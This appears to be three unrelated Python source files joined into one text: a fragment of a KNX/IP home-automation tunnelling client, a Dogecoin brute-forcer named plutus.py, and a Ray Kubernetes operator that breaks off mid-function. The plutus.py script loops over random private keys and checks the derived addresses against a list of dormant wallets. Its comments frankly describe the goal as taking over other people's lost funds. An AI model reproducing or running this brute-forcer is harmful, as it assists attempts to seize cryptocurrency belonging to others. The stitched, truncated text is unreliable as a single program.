SEARCH_REQUEST = 0x0201
SEARCH_RESPONSE = 0x0202
DESCRIPTION_REQUEST = 0x0203
DESCRIPTION_RESPONSE = 0x0204
CONNECT_REQUEST = 0x0205
CONNECT_RESPONSE = 0x0206
CONNECTIONSTATE_REQUEST = 0x0207
CONNECTIONSTATE_RESPONSE = 0x0208
DISCONNECT_REQUEST = 0x0209
DISCONNECT_RESPONSE = 0x020a
DEVICE_CONFIGURATION_REQUEST = 0x0310
DEVICE_CONFIGURATION_ACK = 0x0111
TUNNELING_REQUEST = 0x0420
TUNNELLING_ACK = 0x0421
ROUTING_INDICATION = 0x0530
ROUTING_LOST_MESSAGE = 0x0531
DEVICE_MGMT_CONNECTION = 0x03
TUNNEL_CONNECTION = 0x04
REMLOG_CONNECTION = 0x06
REMCONF_CONNECTION = 0x07
OBJSVR_CONNECTION = 0x08
# CONNECTIONSTATE_RESPONSE Status Codes
# 3.8.2 - 7.8.4
E_DATA_CONNECTION = 0x26
E_CONNECTION_ID = 0x21
E_KNX_CONNECTION = 0x27
# Generic Response Status Code
E_NO_ERROR = 0x0
body = None
def __init__(self, service_type_id):
"""Initalize an empty frame with the given service type."""
self.service_type_id = service_type_id
def to_frame(self):
"""Return the frame as an array of bytes."""
return bytearray(self.header() + self.body)
@classmethod
def from_frame(cls, frame):
"""Initilize the frame object based on a KNX/IP data frame."""
# TODO: Check length
ipframe = cls(frame[2] * 256 + frame[3])
ipframe.body = frame[6:]
return ipframe
def total_length(self):
"""Return the length of the frame (in bytes)."""
return 6 + len(self.body)
def header(self):
"""Return the frame header (as an array of bytes)."""
total_length = self.total_length()
res = [0x06, 0x10, 0, 0, 0, 0]
res[2] = (self.service_type_id >> 8) & 0xff
res[3] = (self.service_type_id >> 0) & 0xff
res[4] = (total_length >> 8) & 0xff
res[5] = (total_length >> 0) & 0xff
return res
# pylint: disable=too-few-public-methods
class KNXTunnelingRequest:
"""Representation of a KNX/IP tunnelling request."""
def __init__(self):
"""Initialize object."""
self.seq = 0
self.cemi = None
self.channel = 0
@classmethod
def from_body(cls, body):
"""Create a tunnelling request from a given body of a KNX/IP frame."""
# TODO: Check length
request = cls()
request.channel = body[1]
request.seq = body[2]
request.cemi = body[4:]
return request
# pylint: disable=too-many-instance-attributes
class CEMIMessage():
"""Representation of a CEMI message."""
CMD_GROUP_READ = 1
CMD_GROUP_WRITE = 2
CMD_GROUP_RESPONSE = 3
CMD_UNKNOWN = 0xff
code = 0
ctl1 = 0
ctl2 = 0
src_addr = None
dst_addr = None
cmd = None
tpci_apci = 0
mpdu_len = 0
data = [0]
dptsize = 0
def __init__(self):
"""Initialize object."""
pass
@classmethod
def from_body(cls, cemi):
"""Create a new CEMIMessage initialized from the given CEMI data."""
# TODO: check that length matches
message = cls()
message.code = cemi[0]
offset = cemi[1]
message.ctl1 = cemi[2 + offset]
message.ctl2 = cemi[3 + offset]
message.src_addr = cemi[4 + offset] * 256 + cemi[5 + offset]
message.dst_addr = cemi[6 + offset] * 256 + cemi[7 + offset]
message.mpdu_len = cemi[8 + offset]
tpci_apci = cemi[9 + offset] * 256 + cemi[10 + offset]
apci = tpci_apci & 0x3ff
# for APCI codes see KNX Standard 03/03/07 Application layer
# table Application Layer control field
if apci & 0x080:
# Group write
message.cmd = CEMIMessage.CMD_GROUP_WRITE
elif apci == 0:
message.cmd = CEMIMessage.CMD_GROUP_READ
elif apci & 0x40:
message.cmd = CEMIMessage.CMD_GROUP_RESPONSE
else:
message.cmd = CEMIMessage.CMD_UNKNOWN
apdu = cemi[10 + offset:]
if len(apdu) != message.mpdu_len:
raise KNXException(
"APDU LEN should be {} but is {}".format(
message.mpdu_len, len(apdu)))
if len(apdu) == 1:
message.data = [apci & 0x2f]
else:
message.data = cemi[11 + offset:]
return message
def init_group(self, dst_addr=1):
"""Initilize the CEMI frame with the given destination address."""
self.code = 0x11
# frametype 1, repeat 1, system broadcast 1, priority 3, ack-req 0,
# confirm-flag 0
self.ctl1 = 0xbc
self.ctl2 = 0xe0 # dst addr type 1, hop count 6, extended frame format
self.src_addr = 0
self.dst_addr = dst_addr
def init_group_write(self, dst_addr=1, data=None, dptsize=0):
"""Initialize the CEMI frame for a group write operation."""
self.init_group(dst_addr)
# unnumbered data packet, group write
self.tpci_apci = 0x00 * 256 + 0x80
self.dptsize = dptsize
if data is None:
self.data = [0]
else:
self.data = data
def init_group_read(self, dst_addr=1):
"""Initialize the CEMI frame for a group read operation."""
self.init_group(dst_addr)
self.tpci_apci = 0x00 # unnumbered data packet, group read
self.data = [0]
def to_body(self):
"""Convert the CEMI frame object to its byte representation."""
body = [self.code, 0x00, self.ctl1, self.ctl2,
(self.src_addr >> 8) & 0xff, (self.src_addr >> 0) & 0xff,
(self.dst_addr >> 8) & 0xff, (self.dst_addr >> 0) & 0xff]
if self.dptsize == 0 and (len(self.data) == 1) and ((self.data[0] & 0xC0) == 0):
# less than 6 bit of data, pack into APCI byte
body.extend([1, (self.tpci_apci >> 8) & 0xff,
((self.tpci_apci >> 0) & 0xff) + self.data[0]])
else:
body.extend([1 + len(self.data), (self.tpci_apci >> 8) &
0xff, (self.tpci_apci >> 0) & 0xff])
body.extend(self.data)
return body
def __str__(self):
"""Return a human readable string for debugging."""
cmd = "??"
if self.cmd == self.CMD_GROUP_READ:
cmd = "RD"
elif self.cmd == self.CMD_GROUP_WRITE:
cmd = "WR"
elif self.cmd == self.CMD_GROUP_RESPONSE:
cmd = "RS"
return "{0:x}->{1:x} {2} {3}".format(
self.src_addr, self.dst_addr, cmd, self.data)
class KNXIPTunnel():
"""A connection to a KNX/IP tunnelling interface."""
data_server = None
control_socket = None
channel = None
seq = 0
data_handler = None
result_queue = None
notify = None
address_listeners = {}
def __init__(self, ip="0.0.0.0", port=3671, valueCache=None):
"""Initialize the connection to the given host/port
Initialized the connection, but does not connect.
"""
self.remote_ip = ip
self.remote_port = port
self.discovery_port = None
self.data_port = None
self.connected = False
self.result_queue = queue.Queue()
self.ack_semaphore = threading.Semaphore(0)
self.conn_state_ack_semaphore = threading.Semaphore(0)
if valueCache is None:
self.value_cache = ValueCache()
else:
self.value_cache = valueCache
self.connection_state = 0
self.keepalive_thread = threading.Thread(target=self.keepalive,
args=())
self.keepalive_thread.daemon = True
self.keepalive_thread.start()
self._lock = threading.Lock()
self._write_delay = 0.05
def __del__(self):
"""Make sure an open tunnel connection will be closed"""
self.disconnect()
def keepalive(self):
"""Background method that makes sure the connection is still open."""
while True:
if self.connected:
self.check_connection_state()
time.sleep(60)
def connect(self, timeout=2):
"""Connect to the KNX/IP tunnelling interface.
If the remote address is "0.0.0.0", it will use the Gateway scanner
to automatically detect a KNX gateway and it will connect to it if one
has been found.
Returns true if a connection could be established, false otherwise
"""
if self.connected:
logging.info("KNXIPTunnel connect request ignored, "
"already connected")
return True
if self.remote_ip == "0.0.0.0":
scanner = GatewayScanner()
try:
ipaddr, port = scanner.start_search()
logging.info("Found KNX gateway %s/%s", ipaddr, port)
self.remote_ip = ipaddr
self.remote_port = port
except TypeError:
logging.error("No KNX/IP gateway given and no gateway "
"found by scanner, aborting %s")
# Clean up cache
self.value_cache.clear()
# Find my own IP
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((self.remote_ip, self.remote_port))
local_ip = sock.getsockname()[0]
if self.data_server:
logging.info("Data server already running, not starting again")
else:
self.data_server = DataServer((local_ip, 0),
DataRequestHandler,
self)
dummy_ip, self.data_port = self.data_server.server_address
data_server_thread = threading.Thread(
target=self.data_server.serve_forever)
data_server_thread.daemon = True
data_server_thread.start()
logging.debug(
"Started data server on UDP port %s", self.data_port)
self.control_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.control_socket.bind((local_ip, 0))
self.control_socket.settimeout(timeout)
# Connect packet
frame = KNXIPFrame(KNXIPFrame.CONNECT_REQUEST)
# Control endpoint
body = []
body.extend([0x08, 0x01]) # length 8 bytes, UPD
dummy_ip, port = self.control_socket.getsockname()
body.extend(ip_to_array(local_ip))
body.extend(int_to_array(port, 2))
# Data endpoint
body.extend([0x08, 0x01]) # length 8 bytes, UPD
body.extend(ip_to_array(local_ip))
body.extend(int_to_array(self.data_port, 2))
#
body.extend([0x04, 0x04, 0x02, 0x00])
frame.body = body
try:
self.control_socket.sendto(bytes(frame.to_frame()),
(self.remote_ip, self.remote_port))
received = self.control_socket.recv(1024)
except socket.error:
self.control_socket.close()
self.control_socket = None
logging.error("KNX/IP gateway did not respond to connect request")
return False
# Check if the response is an TUNNELING ACK
r_sid = received[2] * 256 + received[3]
if r_sid == KNXIPFrame.CONNECT_RESPONSE:
self.channel = received[6]
status = received[7]
if status == 0:
hpai = received[8:10]
logging.debug("Connected KNX IP tunnel " +
"(Channel: {}, HPAI: {} {})".format(
self.channel, hpai[0], hpai[1]))
else:
logging.error("KNX IP tunnel connect error:" +
"(Channel: {}, Status: {})".format(
self.channel, status))
return False
else:
logging.error(
"Could not initiate tunnel connection, STI = {0:%s}", r_sid)
return False
self.connected = True
return True
def disconnect(self):
"""Disconnect an open tunnel connection"""
if self.connected and self.channel:
logging.debug("Disconnecting KNX/IP tunnel...")
frame = KNXIPFrame(KNXIPFrame.DISCONNECT_REQUEST)
frame.body = self.hpai_body()
# TODO: Glaube Sequence erhoehen ist nicht notwendig im Control
# Tunnel beim Disconnect???
if self.seq < 0xff:
self.seq += 1
else:
self.seq = 0
self.control_socket.sendto(
bytes(frame.to_frame()), (self.remote_ip, self.remote_port))
# TODO: Impelement the Disconnect_Response Handling from Gateway
# Control Channel > Client Control Channel
else:
logging.debug("Disconnect - no connection, nothing to do")
# Cleanup
if self.data_server is not None:
self.data_server.shutdown()
self.data_server = None
self.discovery_port = None
self.data_port = None
self.result_queue.queue.clear()
self.value_cache.clear()
self.ack_semaphore.release()
self.conn_state_ack_semaphore.release()
self.connection_state = 0
self.seq = 0
self.channel = None
self.connected = False
def check_connection_state(self):
"""Check the state of the connection using connection state request.
This sends a CONNECTION_STATE_REQUEST. This method will only return
True, if the connection is established and no error code is returned
from the KNX/IP gateway
"""
if not self.connected:
self.connection_state = -1
return False
frame = KNXIPFrame(KNXIPFrame.CONNECTIONSTATE_REQUEST)
frame.body = self.hpai_body()
# Send maximum 3 connection state requests with a 10 second timeout
res = False
self.connection_state = 0
maximum_retry = 3
for retry_counter in range(0, maximum_retry):
logging.debug("Heartbeat: Send connection state request")
# Suggestion:
# Carve the Control Socket out of the KNXIPTunnel
# Class and Public only the Send and Receive
# function and Implement in there the Heartbeat so we
# can block when other Functions want to send
self.control_socket.settimeout(10) # Kind of a quirks
self.control_socket.sendto(bytes(frame.to_frame()),
(self.remote_ip, self.remote_port))
try:
self.control_socket.sendto(bytes(frame.to_frame()),
(self.remote_ip, self.remote_port))
receive = self.control_socket.recv(1024)
except socket.timeout:
logging.info("Heartbeat: No response, Retry Counter %d/%d",
retry_counter, maximum_retry)
break
frame = KNXIPFrame.from_frame(receive)
if frame.service_type_id == KNXIPFrame.CONNECTIONSTATE_RESPONSE:
if frame.body[1] == KNXIPFrame.E_NO_ERROR:
logging.debug("Heartbeat: Successful")
res = True
break
if frame.body[1] == KNXIPFrame.E_CONNECTION_ID:
logging.error(
"Heartbeat: Response No active "
"connection found for Channel:%d ", self.channel
)
if frame.body[1] == KNXIPFrame.E_DATA_CONNECTION:
logging.error(
"Heartbeat: Response Data Connection Error Response "
"for Channel:%d ", self.channel
)
if frame.body[1] == KNXIPFrame.E_DATA_CONNECTION:
logging.error(
"Heartbeat: Response KNX Sub Network Error Response "
"for Channel:%d ", self.channel
)
else:
logging.error("Heartbeat: Invalid Response!")
if self.connection_state != 0:
logging.info("Heartbeat: Connection state was %s",
self.connection_state)
res = False
if not res:
if self.connection_state == 0:
self.connection_state = -1
self.disconnect()
return False
return True
def hpai_body(self):
""" Create a body with HPAI information.
This is used for disconnect and connection state requests.
"""
body = []
# ============ IP Body ==========
body.extend([self.channel]) # Communication Channel Id
body.extend([0x00]) # Reserverd
# =========== Client HPAI ===========
body.extend([0x08]) # HPAI Length
body.extend([0x01]) # Host Protocol
# Tunnel Client Socket IP
body.extend(ip_to_array(self.control_socket.getsockname()[0]))
# Tunnel Client Socket Port
body.extend(int_to_array(self.control_socket.getsockname()[1]))
return body
def send_tunnelling_request(self, cemi, auto_connect=True):
"""Sends a tunneling request based on the given CEMI data.
This method does not wait for an acknowledge or result frame.
"""
if not self.connected:
if auto_connect:
if not self.connect():
raise KNXException("KNX tunnel not reconnected")
else:
raise KNXException("KNX tunnel not connected")
frame = KNXIPFrame(KNXIPFrame.TUNNELING_REQUEST)
# Connection header see KNXnet/IP 4.4.6 TUNNELLING_REQUEST
body = [0x04, self.channel, self.seq, 0x00]
if self.seq < 0xff:
self.seq += 1
else:
self.seq = 0
body.extend(cemi.to_body())
frame.body = body
self.data_server.socket.sendto(
frame.to_frame(), (self.remote_ip, self.remote_port))
# See KNX specification 3.8.4 chapter 2.6 "Frame confirmation"
# Send KNX packet 2 times if not acknowledged and close
# the connection if no ack is received
res = self.ack_semaphore.acquire(blocking=True, timeout=1)
# Resend package if not acknowledged after 1 seconds
if not res:
self.data_server.socket.sendto(
frame.to_frame(), (self.remote_ip, self.remote_port))
res = self.ack_semaphore.acquire(blocking=True, timeout=1)
# disconnect and reconnect of not acknowledged
if not res:
self.disconnect()
self.connect()
return res
def group_read(self, addr, use_cache=True, timeout=1):
"""Send a group read to the KNX bus and return the result."""
if use_cache:
res = self.value_cache.get(addr)
if res:
logging.debug(
"Got value of group address %s from cache: %s", addr, res)
return res
cemi = CEMIMessage()
cemi.init_group_read(addr)
with self._lock:
# There might be old messages in the result quue, remove them
self.result_queue.queue.clear()
self.send_tunnelling_request(cemi)
# Wait for the result
try:
res = self.result_queue.get(block=True, timeout=timeout)
except queue.Empty:
return None
self.result_queue.task_done()
return res
def group_write(self, addr, data, dptsize=0):
"""Send a group write to the given address.
The method does not check if the address exists and the write request
is valid.
"""
cemi = CEMIMessage()
cemi.init_group_write(addr, data, dptsize)
with self._lock:
self.send_tunnelling_request(cemi)
# Workaround for lost KNX packets
if self._write_delay:
time.sleep(self._write_delay)
def group_toggle(self, addr, use_cache=True):
"""Toggle the value of an 1-bit group address.
If the object has a value != 0, it will be set to 0, otherwise to 1
"""
data = self.group_read(addr, use_cache)
if len(data) != 1:
problem = "Can't toggle a {}-octet group address {}".format(
len(data), addr)
logging.error(problem)
raise KNXException(problem)
if data[0] == 0:
self.group_write(addr, [1])
elif data[0] == 1:
self.group_write(addr, [0])
else:
problem = "Can't toggle group address {} as value is {}".format(
addr, data[0])
logging.error(problem)
raise KNXException(problem)
def register_listener(self, address, func):
"""Adds a listener to messages received on a specific address
If some KNX messages will be received from the KNX bus, this listener
will be called func(address, data).
There can be multiple listeners for a given address
"""
try:
listeners = self.address_listeners[address]
except KeyError:
listeners = []
self.address_listeners[address] = listeners
if not func in listeners:
listeners.append(func)
return True
def unregister_listener(self, address, func):
"""Removes a listener function for a given address
Remove the listener for the given address. Returns true if the listener
was found and removed, false otherwise
"""
listeners = self.address_listeners[address]
if listeners is None:
return False
if func in listeners:
listeners.remove(func)
return True
return False
def received_message(self, address, data):
"""Process a message received from the KNX bus."""
self.value_cache.set(address, data)
if self.notify:
self.notify(address, data)
try:
listeners = self.address_listeners[address]
except KeyError:
listeners = []
for listener in listeners:
listener(address, data)
class DataRequestHandler(SocketServer.BaseRequestHandler):
"""The class that handles incoming UDP packets from the KNX/IP tunnel."""
def handle(self):
"""Process an incoming package."""
data = self.request[0]
sock = self.request[1]
frame = KNXIPFrame.from_frame(data)
if frame.service_type_id == KNXIPFrame.TUNNELING_REQUEST:
req = KNXTunnelingRequest.from_body(frame.body)
msg = CEMIMessage.from_body(req.cemi)
send_ack = False
tunnel = self.server.tunnel
if msg.code == 0x29:
# LData.req
send_ack = True
elif msg.code == 0x2e:
# LData.con
send_ack = True
else:
problem = "Unimplemented cEMI message code {}".format(msg.code)
logging.error(problem)
raise KNXException(problem)
# Cache data
if (msg.cmd == CEMIMessage.CMD_GROUP_WRITE) or (
msg.cmd == CEMIMessage.CMD_GROUP_RESPONSE):
# saw a value for a group address on the bus
tunnel.received_message(msg.dst_addr, msg.data)
# Put RESPONSES into the result queue
if msg.cmd == CEMIMessage.CMD_GROUP_RESPONSE:
tunnel.result_queue.put(msg.data)
if send_ack:
bodyack = [0x04, req.channel, req.seq, E_NO_ERROR]
ack = KNXIPFrame(KNXIPFrame.TUNNELLING_ACK)
ack.body = bodyack
sock.sendto(ack.to_frame(), self.client_address)
elif frame.service_type_id == KNXIPFrame.TUNNELLING_ACK:
logging.debug("Received tunneling ACK")
self.server.tunnel.ack_semaphore.release()
elif frame.service_type_id == KNXIPFrame.DISCONNECT_RESPONSE:
logging.debug("Disconnected")
self.channel = None
tunnel = self.server.tunnel
tunnel.data_server.shutdown()
tunnel.data_server = None
elif frame.service_type_id == KNXIPFrame.CONNECTIONSTATE_RESPONSE:
logging.debug("Connection state response")
tunnel.connection_state = frame.body[2]
else:
logging.info(
"Message type %s not yet implemented", frame.service_type_id)
class DataServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
"""Server that handled the UDP connection to the KNX/IP tunnel."""
def __init__(self, server_address, RequestHandlerClass, tunnel):
super(DataServer, self).__init__(server_address, RequestHandlerClass)
self.tunnel = tunnel
|
plutus.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
# Added fastecdsa - June 2019 - Ian McMurray
# Program adjustment to work on Dogecoin Dormant Wallets - May 2021 - LongWayHomie
# Main idea is to look for private keys to lost wallets of Dogecoin. List has been created with dormant (not active, probably lost) wallets since 2014
# Its kind of impossible, but why not?
# much wow very sneaky so smart such (ill)legal
import os
import hashlib
import time
import pickle
import binascii
import multiprocessing
from fastecdsa import keys, curve
def generate_private_key():
"""Generate a random 32-byte hex integer which serves as a randomly generated Bitcoin private key.
Average Time: 0.0000061659 seconds
"""
return binascii.hexlify(os.urandom(32)).decode('utf-8').upper()
def private_key_to_public_key(private_key):
"""Accept a hex private key and convert it to its respective public key. Because converting a private key to
a public key requires SECP256k1 ECDSA signing, this function is the most time consuming and is a bottleneck
in the overall speed of the program.
Average Time: 0.0016401287 seconds
"""
# get the public key corresponding to the private key we just generated
c = int('0x%s'%private_key,0)
d = keys.get_public_key(c, curve.secp256k1)
return '04%s%s'%('{0:x}'.format(int(d.x)), '{0:x}'.format(int(d.y)))
def public_key_to_address(public_key):
"""Accept a public key and convert it to its resepective P2PKH wallet address.
Average Time: 0.0000801390 seconds
"""
#print('Wanting to [%s] this to address'%public_key)
output = []; alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
var = hashlib.new('ripemd160')
try:
var.update(hashlib.sha256(binascii.unhexlify(public_key.encode())).digest())
var = '1E' + var.hexdigest() + hashlib.sha256(hashlib.sha256(binascii.unhexlify(('1E' + var.hexdigest()).encode())).digest()).hexdigest()[0:8] #changed bit from 00 to 1E to generate Dogecoin public address
count = [char != '0' for char in var].index(True) // 2
n = int(var, 16)
while n > 0:
n, remainder = divmod(n, 58)
output.append(alphabet[remainder])
for i in range(count): output.append(alphabet[0])
return ''.join(output[::-1])
except:
# Nothing
return -1
def process(private_key, public_key, address, database):
"""Accept an address and query the database. If the address is found in the database, then it is assumed to have a
balance and the wallet data is written to the hard drive. If the address is not in the database, then it is
assumed to be empty and printed to the user. This is a fast and efficient query.
Average Time: 0.0000026941 seconds
"""
if address in database:
with open('much_money.txt', 'a') as file:
file.write('hex private key: ' + str(private_key) + '\n' +
'public key: ' + str(public_key) + '\n' +
'address: ' + str(address) + '\n\n' +
'WIF private key: ' + str(private_key_to_WIF(private_key)) + '\n') #WIF private key generation enabled again
else:
#TODO: counter so I wont get epilepsy from falling addresses
#print("Guesses per sec: " + float(num_tried) / elapsed_time)
print("Dogecoin Wallet: " + str(address))
#print("Dogecoin Wallet: " + str(address) + " " + str(private_key_to_WIF(private_key))) #debug to check if generated WIF is working fine for generated address
def private_key_to_WIF(private_key):
"""Convert the hex private key into Wallet Import Format for easier wallet importing. This function is
only called if a wallet with a balance is found. Because that event is rare, this function is not significant
to the main pipeline of the program and is not timed.
"""
var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify('9E' + private_key)).hexdigest())).hexdigest() #changed 80 to 9E for dogecoin WIF address
var = binascii.unhexlify('9E' + private_key + var[0:8]) #changed 80 to 9E for dogecoin WIF address
alphabet = chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
value = pad = 0; result = ''
for i, c in enumerate(var[::-1]): value += 256**i * c
while value >= len(alphabet):
div, mod = divmod(value, len(alphabet))
result, value = chars[mod] + result, div
result = chars[value] + result
for c in var:
if c == 0: pad += 1
else: break
return chars[0] * pad + result
def main(database):
"""Create the main pipeline by using an infinite loop to repeatedly call the functions, while utilizing
multiprocessing from __main__. Because all the functions are relatively fast, it is better to combine
them all into one process.
"""
while True:
private_key = generate_private_key() # 0.0000061659 seconds
public_key = private_key_to_public_key(private_key) # 0.0016401287 seconds
address = public_key_to_address(public_key) # 0.0000801390 seconds
if address != -1:
process(private_key, public_key, address, database) # 0.0000026941 seconds
# --------------------
# 0.0017291287 seconds
if __name__ == '__main__':
"""Deserialize the database and read into a list of sets for easier selection and O(1) complexity. Initialize
the multiprocessing to target the main function with cpu_count() concurrent processes. """
database = [set(line.strip() for line in open ('database/dormant_list'))]
print('==================================')
print('DOGECOIN DORMANT WALLET AND RICH LIST COLLIDER')
print('based on Plutus from IsaacDelly and implementation of fastecdsa imcMurray')
print('Adjustment to Dogecoin done by LongWayHomie')
print('==================================')
print(' ▄ ▄ ')
print(' ▌▒█ ▄▀▒▌ ')
print(' ▌▒▒█ ▄▀▒▒▒▐ ')
print(' ▐▄█▒▒▀▀▀▀▄▄▄▀▒▒▒▒▒▐ ')
print(' ▄▄▀▒▒▒▒▒▒▒▒▒▒▒█▒▒▄█▒▐ ')
print(' ▄▀▒▒▒░░░▒▒▒░░░▒▒▒▀██▀▒▌ ')
print(' ▐▒▒▒▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▀▄▒▌ ')
print(' ▌░░▌█▀▒▒▒▒▒▄▀█▄▒▒▒▒▒▒▒█▒▐ ')
print(' ▐░░░▒▒▒▒▒▒▒▒▌██▀▒▒░░░▒▒▒▀▄▌ ')
print(' ▌░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░▒▒▒▒▌ ')
print('▌▒▒▒▄██▄▒▒▒▒▒▒▒▒░░░░░░░░▒▒▒▐ ')
print('▐▒▒▐▄█▄█▌▒▒▒▒▒▒▒▒▒▒░▒░▒░▒▒▒▒▌')
print('▐▒▒▐▀▐▀▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░▒░▒▒▐ ')
print(' ▌▒▒▀▄▄▄▄▄▄▒▒▒▒▒▒▒▒░▒░▒░▒▒▒▌ ')
print(' ▐▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░▒▒▄▒▒▐ ')
print(' ▀▄▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░▒▄▒▒▒▒▌ ')
print(' ▀▄▒▒▒▒▒▒▒▒▒▒▄▄▄▀▒▒▒▒▄▀ ')
print(' ▀▄▄▄▄▄▄▀▀▀▒▒▒▒▒▄▄▀ ')
print(' ▀▀▀▀▀▀▀▀▀▀▀▀ ')
print('Dogecoin list of wallets loaded')
time.sleep(5)
print('Executing...')
for cpu in range(multiprocessing.cpu_count()):
multiprocessing.Process(target = main, args = (database, )).start()
|
operator.py
|
import logging
import multiprocessing as mp
import os
import time
import threading
from typing import Any
from typing import Callable
from typing import Dict
from typing import Tuple
from typing import Optional
from kubernetes.client.exceptions import ApiException
import yaml
import ray.autoscaler._private.monitor as monitor
from ray._private import services
from ray.autoscaler._private import commands
from ray.ray_operator import operator_utils
from ray.ray_operator.operator_utils import AUTOSCALER_RETRIES_FIELD
from ray.ray_operator.operator_utils import STATUS_AUTOSCALING_EXCEPTION
from ray.ray_operator.operator_utils import STATUS_ERROR
from ray.ray_operator.operator_utils import STATUS_RUNNING
from ray.ray_operator.operator_utils import STATUS_UPDATING
from ray import ray_constants
logger = logging.getLogger(__name__)
# Queue to process cluster status updates.
cluster_status_q = mp.Queue() # type: mp.Queue[Tuple[str, str, str]]
class RayCluster():
"""Manages an autoscaling Ray cluster.
Attributes:
config: Autoscaling configuration dict.
subprocess: The subprocess used to create, update, and monitor the
Ray cluster.
"""
def __init__(self, config: Dict[str, Any]):
self.config = config
self.name = self.config["cluster_name"]
self.namespace = self.config["provider"]["namespace"]
# Make directory for configs of clusters in the namespace,
# if the directory doesn't exist already.
namespace_dir = operator_utils.namespace_dir(self.namespace)
if not os.path.isdir(namespace_dir):
os.mkdir(namespace_dir)
self.config_path = operator_utils.config_path(
cluster_namespace=self.namespace, cluster_name=self.name)
# Tracks metadata.generation field of associated custom resource.
# K8s increments this field whenever the spec of the custom resource is
# updated.
self._generation = 0
# Tracks metadata.labels.autoscalerRetries field of the CR.
# The operator increments this field whenever we attempt recovery from
# autoscaler failure.
self._num_retries = 0
# Monitor subprocess
self.subprocess = None # type: Optional[mp.Process]
# Monitor logs for this cluster will be prefixed by the monitor
# subprocess name:
self.subprocess_name = ",".join([self.name, self.namespace])
self.monitor_stop_event = mp.Event()
self.setup_logging()
def create_or_update(self, restart_ray: bool = False) -> None:
""" Create/update the Ray Cluster and run the monitoring loop, all in a
subprocess.
The main function of the Operator is managing the
subprocesses started by this method.
Args:
restart_ray: If True, restarts Ray to recover from failure.
"""
self.do_in_subprocess(self._create_or_update, args=(restart_ray, ))
def _create_or_update(self, restart_ray: bool = False) -> None:
try:
self.start_head(restart_ray=restart_ray)
self.start_monitor()
except Exception:
# Report failed autoscaler status to trigger cluster restart.
cluster_status_q.put((self.name, self.namespace,
STATUS_AUTOSCALING_EXCEPTION))
# `status_handling_loop` will increment the
# `status.AutoscalerRetries` of the CR. A restart will trigger
# at the subsequent "MODIFIED" event.
raise
def start_head(self, restart_ray: bool = False) -> None:
self.write_config()
# Don't restart Ray on head unless recovering from failure.
no_restart = not restart_ray
# Create or update cluster head and record config side effects.
self.config = commands.create_or_update_cluster(
self.config_path,
override_min_workers=None,
override_max_workers=None,
no_restart=no_restart,
restart_only=False,
yes=True,
no_config_cache=True,
no_monitor_on_head=True)
# Write the resulting config for use by the autoscaling monitor:
self.write_config()
def start_monitor(self) -> None:
"""Runs the autoscaling monitor."""
ray_head_pod_ip = commands.get_head_node_ip(self.config_path)
port = operator_utils.infer_head_port(self.config)
redis_address = services.address(ray_head_pod_ip, port)
self.mtr = monitor.Monitor(
redis_address=redis_address,
autoscaling_config=self.config_path,
redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
prefix_cluster_info=True,
stop_event=self.monitor_stop_event)
self.mtr.run()
def do_in_subprocess(self, f: Callable[[], None], args: Tuple) -> None:
# First stop the subprocess if it's alive
self.clean_up_subprocess()
# Reinstantiate process with f as target and start.
self.subprocess = mp.Process(
name=self.subprocess_name, target=f, args=args, daemon=True)
self.subprocess.start()
def clean_up_subprocess(self):
"""
Clean up the monitor process.
Executed when CR for this cluster is "DELETED".
Executed when Autoscaling monitor is restarted.
"""
if self.subprocess and self.subprocess.is_alive():
# Triggers graceful stop of the monitor loop.
self.monitor_stop_event.set()
self.subprocess.join()
# Clears the event for subsequent runs of the monitor.
self.monitor_stop_event.clear()
def clean_up(self) -> None:
"""Executed when the CR for this cluster is "DELETED".
The key thing is to end the monitoring subprocess.
"""
self.clean_up_subprocess()
self.clean_up_logging()
self.delete_config()
def setup_logging(self) -> None:
"""Add a log handler which appends the name and namespace of this
cluster to the cluster's monitor logs.
"""
self.handler = logging.StreamHandler()
# Filter by subprocess name to get this cluster's monitor logs.
self.handler.addFilter(
lambda rec: rec.processName == self.subprocess_name)
# Lines start with "<cluster name>,<cluster namespace>:"
logging_format = ":".join(
[self.subprocess_name, ray_constants.LOGGER_FORMAT])
self.handler.setFormatter(logging.Formatter(logging_format))
operator_utils.root_logger.addHandler(self.handler)
def clean_up_logging(self) -> None:
operator_utils.root_logger.removeHandler(self.handler)
def set_config(self, config: Dict[str, Any]) -> None:
self.config = config
def write_config(self) -> None:
"""Write config to disk for use by the autoscaling monitor."""
with open(self.config_path, "w") as file:
yaml.dump(self.config, file)
def delete_config(self) -> None:
os.remove(self.config_path)
def set_generation(self, generation: int) -> None:
self._generation = generation
def set_num_retries(self, num_retries: int) -> None:
self._num_retries = num_retries
def get_generation(self) -> int:
return self._generation
def get_num_retries(self) -> int:
return self._num_retries
# Maps ray cluster (name, namespace) pairs to RayCluster python objects.
ray_clusters = {} # type: Dict[Tuple[str, str], RayCluster]
def run_event_loop():
# Instantiate event stream.
if operator_utils.NAMESPACED_OPERATOR:
raycluster_cr_stream = operator_utils.namespaced_cr_stream(
namespace=operator_utils.OPERATOR_NAMESPACE)
else:
raycluster_cr_stream = operator_utils.cluster_scoped_cr_stream()
# Run control loop.
for event in raycluster_cr_stream:
cluster_cr = event["object"]
cluster_name = cluster_cr["metadata"]["name"]
cluster_namespace = cluster_cr["metadata"]["namespace"]
event_type = event["type"]
handle_event(event_type, cluster_cr, cluster_name, cluster_namespace)
def handle_event(event_type, cluster_cr, cluster_name, cluster_namespace):
# TODO: This only detects errors in the parent process and thus doesn't
# catch cluster-specific autoscaling failures. Fix that (perhaps at
# the same time that we eliminate subprocesses).
try:
cluster_action(event_type, cluster_cr, cluster_name, cluster_namespace)
except Exception:
log_prefix = ",".join(cluster_name, cluster_namespace)
if event_type in ["ADDED", "MODIFIED"]:
